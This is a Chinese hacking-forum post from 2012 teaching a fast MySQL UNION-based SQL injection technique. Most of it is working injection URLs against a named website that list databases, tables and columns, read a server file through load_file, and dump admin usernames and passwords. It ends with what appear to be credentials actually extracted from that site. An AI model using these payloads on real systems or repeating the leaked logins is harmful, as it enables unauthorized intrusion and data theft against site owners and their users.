找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 mysql注入高效方法
返回列表 发新帖
查看: 2868|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似# R/ F0 n, O1 q& o8 V
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
3 i: Y2 f: v: H5 z
0 ?5 l; ], `. A' m6 i
/ X5 q* X1 G' [2 u$ X' N" k) K0 \优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
. t) I- c; c4 m8 J! W) I' R3 P( r1 e$ |: ~1 b4 _
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
4 D: f$ ?: ^6 S* |1 y$ m/ m6 w7 J4 v$ X; H) t3 t; ~5 p% u+ d: E
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示' O. ?1 [9 t8 C
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等& f. X. T9 U; n' F; y, w- a2 m
( e' C$ K: Q- O* S7 u
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
% A. J; p; }( t: j6 ]! U
0 D) B( s. F6 g6 E4 C读出所有库:
2 K* U' k2 a; c" I9 m7 }' }! f$ R2 _http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA# d- v! \( z) z7 B& D: j' [$ N

8 {* z5 ^. M* x% w/ t& E8 S1 E

! O" |- W% q& l0 m  ?读出所有表:4 Z9 g# a3 s1 V# @3 U% P" ~6 ^
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
/ I1 H8 m; P* U1 z
4 z: x/ F. [- o( i读出所有表字段:  b0 C! d' |: g
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
- @; `/ n* E8 b7 a5 F$ K2 ?*/ (97,100,109,105,110)为admin的ascii码 依次类推0 J& }( {+ K/ H# W& s% m

7 g) f( W* [$ p8 H* c读出所有表字段里的内容:8 v. P& G7 i. Q9 _* t; n1 ^
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
; k" p9 Y! L6 ?! d
# M/ B5 g, Y0 j* \. O$ L
  f* @2 ?  v6 F  `# C/ {# w. w6 Z; _* L$ G: j% V0 U
9 J$ @. h# t8 [" G; _. b) E

0 E7 n& M& }) g% E$ c
* q6 L: _: x8 g9 Bhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23( Q6 O+ m# D' U) i3 I

/ J9 w% ]( l7 e5 k0 L/ \" \! V
# Y. `/ _$ }4 K$ A8 ~. Yhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23, r/ t8 w/ H0 y

1 Z4 o/ k* u. f& Y2 Q  a1 \5 X+ ehttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
% I/ Z% k+ R' H2 R3 i' ~- V- W/ b/ h+ D8 ]

; Z! f& k6 x1 ~' x9 ^+ Phttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
1 D! Q2 }( T  j# j& K% H+ p: n( a+ @/ N, u& q  `
- ~  T- [+ k! P1 n# R: Z% [7 }
        webmaster:dzb521123,simlab:simadmin200432338 C) g9 |' g) u6 o$ C9 S- x0 X; A
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表